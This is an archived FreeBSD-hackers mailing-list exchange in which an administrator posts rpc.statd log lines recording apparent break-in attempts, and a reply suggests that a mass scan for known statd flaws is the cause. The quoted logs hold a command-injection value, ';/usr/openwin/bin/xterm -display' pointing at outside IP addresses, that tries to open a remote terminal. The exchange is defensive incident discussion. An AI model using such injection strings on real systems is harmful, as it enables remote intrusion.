Skip site navigation (1)Skip section navigation (2)
Date:      Sat, 21 Feb 1998 17:10:34 +1100 (EST)
From:      <nick@feralmonkey.org>
To:        Greg Lehey <grog@lemis.com>
Cc:        FreeBSD Hackers <hackers@freebsd.org>, FreeBSD-isp@freebsd.org
Subject:   Re: New breakin technique?
Message-ID:  <Pine.BSF.4.05.9802211709170.6407-100000@shibumi.feralmonkey.org>
In-Reply-To: <19990221141243.G93492@lemis.com>

next in thread | previous in thread | raw e-mail | index | archive | help
There has been issues with statd on both solaris and linux. It may simply
be someone running a mass-scan.

Nick


On Sun, 21 Feb 1999, Greg Lehey wrote:

> I've just found the following messages in my logs:
> 
> Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
> Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
> Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0;
> 
> Has anybody seen something like this?  It looks as if somebody is
> trying to break in, but I didn't know that rpc.statd could start
> xterms.
> 
> Under these circumstances, it would be interesting to know if
> rpc.statd *must* run as root.  Wouldn't, say, bin be enough?
> 
> Greg
> --
> See complete headers for address, home page and phone numbers
> finger grog@lemis.com for PGP public key
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-hackers" in the body of the message
> 



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.05.9802211709170.6407-100000>